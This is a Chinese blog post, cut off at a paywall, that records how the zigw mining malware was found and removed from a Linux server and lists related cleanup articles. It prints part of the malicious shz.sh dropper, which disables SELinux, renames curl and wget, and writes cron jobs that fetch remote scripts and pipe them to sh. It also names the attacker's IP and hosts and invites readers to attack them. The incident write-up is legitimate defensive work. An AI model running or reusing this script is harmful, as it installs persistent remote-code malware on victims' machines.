记录linux zigw挖矿病毒查杀

最新推荐文章于 2024-08-07 09:17:56 发布
最新推荐文章于 2024-08-07 09:17:56 发布
阅读量1.3k 收藏 2
点赞数 1
分类专栏: Linux 文章标签: linux 挖矿病毒 zigw Linux病毒
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/guanzhengyinqin/article/details/86665212
版权

关于此病毒的参考文献:

https://4hou.win/wordpress/?spm=a2c4e.11153940.blogcont657476.14.53ff2757GtnJxj&cat=6270
病毒介绍

https://yq.aliyun.com/articles/657476
病毒清理,不过有时会复发

https://blog.csdn.net/sayWhat_sayHello/article/details/83988443
病毒清理,理论上已经解决复发问题

在这里插入图片描述
如图,服务器已被 zigw 挖矿病毒入侵,记录进程PID 93724

首先 cat /var/spool/mail/root,发现在 10:26:03 秒利用 curl 下载了一个sh并执行
在这里插入图片描述

下载地址为 140.143.35.89:43768/shz.sh (曝光IP,希望有大牛黑入或攻击可恶的挖矿病毒服务器)
下面是下载下来的shell代码:

#!/bin/sh
setenforce 0 2>dev/null
echo SELINUX=desabled > /etc/sysconfig/selinux 2>/dev/null
sync && echo 3 >/proc/sys/vm/drop_caches
crondir='/var/spool/cron/'"$USER"
cont=`cat ${
    crondir}`
ssht=`cat /root/.ssh/authorized_keys`
echo 1 > /etc/gmbpr2
rtdir="/etc/gmbpr2"
oddir="/etc/gmbpr"
bbdir="/usr/bin/curl"
bbdira="/usr/bin/url"
ccdir="/usr/bin/wget"
ccdira="/usr/bin/get"
mv /usr/bin/wget /usr/bin/get
mv /usr/bin/curl /usr/bin/url
if [ -f "$oddir" ]
	then
		pkill zjgw
		chattr -i  /etc/gmbpr
		rm -f /etc/gmbpr
	else
		echo "ok"
fi
chattr -ia /var/spool/cron
chattr -ia /var/spool/cron/root
if [ -f "$bbdir" ]
	then
		[[ $cont =~ "shz.sh" ]] || echo "*/12 * * * * curl -fsSL http://c.21-2n.com:43768/shz.sh | sh" >> ${crondir}
		[[ $cont =~ "shz.sh" ]] || echo "*/30 * * * * curl -fsSL http://c.21-3n.xyz:43768/bak.sh | sh" >> ${crondir}
	else
		[[ $cont =~ "shz.sh" ]] || echo "*/15 * * * * url -fsSL http://c.21-2n.com:43768/shz.sh | sh" >> ${crondir}
		[[ $cont =~ "shz.sh" ]] || echo "*/30 * * * * url -fsSL http://c.21-3n.xyz:43768/bak.sh | sh" >> ${crondir}
fi
asd=`cat /var/spool/cron/root`
if [ -f "$bbdir" ]
	then
		[[ $asd =~ "shz.sh" ]]
最低0.47元/天 解锁文章
傲娇萌萌哒
关注
专栏目录
Linux挖矿病毒清理流程
ouxx2009的专栏
03-14 1万+
Linux挖矿病毒清理流程 1.前言: 根据阿里云快讯病毒公布: Redis RCE导致h2Miner蠕虫病毒,其利用Redis未授权或弱口令作为入口,使用主从同步的方式从恶意服务器上同步恶意module,之后在目标机器上加载此恶意module并执行恶意指令。在以往常见的攻击者或蠕虫中,其大多都沿用登陆redis后写入定时任务或写ssh key的方式进行入侵,这种方式受权限与系统类型影响并不一定能够成功。而此次使用redis加载module的攻击方式,可以直接执行任意指令或拿到shell交互环境,危害
【安全】查杀linux挖矿病毒 kswapd0
飞的博客
04-11 2246
按照腾讯云报道,此次攻击为“亡命徒(Outlaw)僵尸网络”该僵尸网络最早于2018年被发现,其主要特征为通过SSH爆破攻击目标系统,同时传播基于Perl的Shellbot和门罗币挖矿木马。高cpu占用,使用top命令查看cpu使用率长时间50%以上,cpu占用异常的进程八成就是挖矿病毒进程。此病毒隐藏了自己,top命令无法查看到挖矿病毒进程,可通过sysdig命令找到隐藏进程。注意,该进程有子进程spamd child,需要一同清理,否则会再次重启。同时检查如下目录,将可疑文件清理掉。
Linux服务器挖矿病毒彻底清除与防护实操指南
最新发布
boydoy1987的专栏
08-07 619
Linux服务器在遭受挖矿病毒攻击时,会严重影响其性能和数据安全。本文将提供一套详细的操作步骤,结合实际案例,帮助您彻底清除Linux服务器上的挖矿病毒,并实施有效的防护措施。
Linux杀掉挖矿病毒(qW3xT.2)
u010560993的博客
08-17 3072
本人一个不专业的运维。如有问题可以一起讨论。 今天登陆服务器发现qW3xT.2进程,以至于服务器CPU一直在300以上,写下此文以便查询。 1.查看阿里云服务器日志,查看日志来源。 从哪进来,修改那里的端口及服务密码。 2.查看/root/.ssh/known_host下是否有不认识的IP地址。必要可以将/root/.ssh/下文件干掉。(退出了,你自己都进不来了) 3.执行在跟...
记一次手动查杀Linux服务器挖矿木马
3D的博客
01-17 1919
我实验室的座位隔壁放着一台其他课题组管理的服务器,平时利用率不高。那天我发现服务器的风扇转速拉满持续了至少一天,遂问隔壁在跑什么东西,隔壁同学在课题组问了一圈发现没人在用。两天后我恰好有点时间,帮他们在服务器上进行调查。最终发现是中了挖矿木马,进行了杀毒并把多个存在的系统漏洞都补上了。第一次手动实战查杀,故记录方法和过程。系统版本:Ubuntu 20.04 LST。
【安全】查杀linux上c3pool挖矿病毒xmrig
飞的博客
03-05 1871
病毒来源安装脚本旷池提供的卸载脚本。
Linux下清除挖矿病毒
QZ9420的博客
03-07 967
登录用户系统,显示系统被爆破了33万次了,结果用户的服务器密码改的很简单,极大可能是被爆破成功了。执行top命令,显示 kswapd0 的CPU占用异常。记下该进程ID 5081。这些都是和病毒后台下载运行有关的,按 insert 键,进入编辑模式,全部清空。执行查找命令 find / -name kswapd0。再按":“后,出现提示符”:" ,输入wq 然后回车保存。查看服务器的任务计划 crontab -e。杀掉进行 kill -9 5081。用 rm -rf 命令逐条删除。
分析teamTNT团队Linux挖矿木马执行过程与防范
欢迎访问胡宝全的博客
09-20 1562
分析teamTNT团队Linux挖矿木马执行过程与防范 公司需要扩展海外业务,需要有一台海外云服务器。当我们把应用部署上去时的第二天所有应用down掉了,然后发现ssh连接服务器特别慢。好不容易连接上了执行一下free -h 发现内存占用99%,反手一个top,等了大约2分钟出来结果。 问题排查 查看当前内存:free -h 发现内存占用几乎达到98%。 查看当前进程:top等了大约2分钟出来结果。竟然有7000多个tasks,load average: 459.78, 584.52, 387.07,这明
kdevtmpfsi挖矿病毒解决过程
weixin_43233341的博客
03-03 2925
top 开始cpu消耗在百分80左右,有时会达到99,杀掉进程后几分钟又跳出来, 开始的升级阿里云的高级版,一键查杀,cpu瞬间降到20 继续跟踪。。。 大概两个小时后发现,kdevtmpfsi进程会时不时跳出来,一两秒钟后又自动关闭,此时cpu 再百分20到百分40直接上下波动,如图(正常情况下是稳得) 解决方法 kdevtmpfsi有守护进程。守护进程名称为 kinsing,需要kill后才...
伪装为kswapd0进程的挖矿木马
分享身边生活经验blog
06-26 2499
一、起因 腾讯云给我发了几封邮件说我的服务器被木马攻击。 image.png 我打开服务器监控一看,闲置的服务器CPU飙升。 image.png 二、排查 2.1 首先查询CPU占用最多的3个进程 查使用内存最多的K个进程 方式一:ps -aux | sort -k3nr | head -K image.png sort参数说明: |选项 |说明 |—————|————————————————————————— |-n |依照数值的大小排序,不加-n按字符串大小
网络安全从入门到精通(特别篇I):Linux安全事件应急响应之Linux应急响应基础必备技能
HACKONE的博客
04-10 157
awk 首先将每条日志中的IP抓出来,如日志格式被自定义过,可以 -F 定义分隔符和 print指定列;
如何快速发现linux系统有挖矿病毒
weixin_47450720的博客
03-17 2937
查看进程信息:使用ps命令查看系统的进程信息,查找到异常的进程,可以通过kill命令结束这些进程。使用系统监控工具:可以使用系统自带的top、htop等工具或第三方监控工具,查看系统的CPU、内存、网络等资源占用情况,如果发现异常占用情况,可能存在挖矿病毒。检查系统日志:查看系统日志文件,如/var/log/messages等文件,查找到异常日志信息,可以分析日志文件,确认是否存在挖矿病毒。要及时发现并清除挖矿病毒,需要经常监控系统的运行情况,及时发现异常情况,并结合多种手段进行分析和排查。
linux挖矿病毒清理
yb890102的博客
01-05 1488
网络安全,挖矿病毒清流,linux中毒
Linux服务器挖矿病毒处理
自己在学习过程中的总结
06-19 1825
情况说明:挖矿进程被隐藏(CPU占用50%,htop/top却看不到异常进程),结束挖矿进程后马上又会运行起来(crontab -l查看发现没有定时任务)。1.中毒表现 2.解决办法:断网并修改root密码,找出隐藏的挖矿进程,关闭病毒启动服务,杀掉挖矿进程 3. 防止黑客再次入侵:查找异常IP,封禁异常IP,查看是否有陌生公钥。中毒表现:服务器是24核的,前12核的CPU占用一直处于100%,即使重启服务器,马上就会占用12核的CPU,并且系统内存占用也很大。在没有使用软件的情况下,CPU使用率很高。
Linux挖矿病毒清理通用思路
dayouzi的博客
04-19 3805
在被植入挖矿病毒后,如果攻击者拥有足够的权限,比如root权限,往往会对系统命令进行劫持,达到隐藏自己的效果,故第一步最好是先确认是否存在rootkit劫持、库劫持,之后的命令执行操作也最好是通过busybox执行。
Linux挖矿病毒查杀
翼幻幻幻幻的博客
09-26 728
项目场景: 服务器异常卡顿 问题描述: 在执行任务时异常缓慢,CPU占用率异常 原因分析: 使用top命令查看后发现某一进程占用率1000多,怀疑中了挖矿病毒 解决方案: 切到root用户,杀掉该进程,发现过一段时间该进程再次启动,猜测该病毒设置了定时自启,使用以下命令查看当前用户计划任务 crontab -l 注释掉crontab任务,执行以下命令进行编辑,在前面加#将其注释掉 crontab -e 编辑,保存,再次执行crontab -l查看 再次将该进程kill掉,观察一
linux服务器彻底清除xmrig挖矿病毒
暴走地水牛的博客
06-02 4029
linux服务器上彻底清除xmrig挖矿病毒
linux挖矿的清理工具,Linux挖矿病毒的清除与分析
weixin_36372610的博客
05-06 2337
文章目录起因清除过程确定病因开始清除复发定时任务update.sh分析修复样本分析:networkservice文件的分析分析准备功能分析sysguard样本下载*本文中涉及到的相关漏洞已报送厂商并得到修复,本文仅限技术研究与讨论,严禁用于非法用途,否则产生的一切后果自行承担。*本文原创作者:xuing,本文属于林哲博客原创奖励计划,未经许可禁止转载起因舍友在宿舍喊着,这服务器好卡啊,难受啊!我调...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值